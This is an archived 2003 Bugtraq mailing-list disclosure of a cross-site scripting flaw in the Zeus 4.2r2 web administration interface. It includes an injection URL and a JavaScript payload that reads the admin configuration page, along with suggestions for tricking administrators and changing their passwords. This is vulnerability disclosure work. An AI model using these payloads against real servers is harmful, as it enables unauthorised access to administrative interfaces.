Another ZEUS Server web admin XSS!

From: Hugo (overclocking_a_la_abuela_at_hotmail.com)
Date: 05/29/03

  • Next message: Luca Ercoli: "Activity Monitor 2002 remote Denial of Service" 
    Date: 29 May 2003 17:48:30 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

    Hi,

    another XSS, now on the ZEUS web admin interface.
    The tested software is Zeus 4.2r2 (webadmin-4.2r2) on Linux x86

    This is not the same issue as bid 6144 (index.fcgi),
    now is on "vs_diag.cgi".

    Exploit is simple:

    http://>:9090/apps/web/vs_diag.cgi?server=<YOUR_CODE>

    I have read this post: (http://www.securityfocus.com/archive/1/302961),
    regarding "index.fcgi" XSS.Mr, Colin Watson, claims that XSS bug on their
    software is not a big risk because: "The Zeus Administration Server uses
    cookies to record several items oftransient state: the state of the
    folding list of groups of virtualservers, and the list of currently
    monitored variables and machines ifreal-time monitoring is in place. It
    does not use cookies to store any security-sensitive information (...)"

    Who needs cookies? :-) ZEUS uses "Basic Auth" (base 64 encoded) for the
    session tracking...but ZEUS does not allow http TRACE method, so we can
    not run a XST (Cross Site Tracing) against it :-(
    I know litle about client side scripting, but probably there's some way to
    send POST requests and... change the admin password?, stop the web
    server?... I'm quite sure there's some way to do this.

    With the script we show below an attacker can do an HTTP request to the
    web admin interface of the ZEUS and redirect the output...
    Of course you have to trick the admin...

    http://>:9090/apps/web/vs_diag.cgi?server=&lt;script&gt;function%20pedo()
    {var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open
    ("GET","    http://>:9090/apps/web/global.fcgi",false);xmlHttp.send
    ();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}pedo();alert("Have%
    20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%
    20this%20info!%20Much%20more%20evil%20actions%20are%20possible...")
    &lt;/script&gt;

    This is for IE, for other browsers you may modify this code.
    Imagination is the best friend of the attacker. Open your minds, XSS does
    not only means execution of commands on the client side... succefully
    exploited, in some scenarios (like web admin interfaces) those bugs can
    lead on execution of commands on the server side...

    See you,

    Hugo Vázquez Caramés & Toni Cortés Martínez
    INFOHACKING RESEARCH 2003
    www.infohacking.com
    Barcelona
    Spain

  • Next message: Luca Ercoli: "Activity Monitor 2002 remote Denial of Service"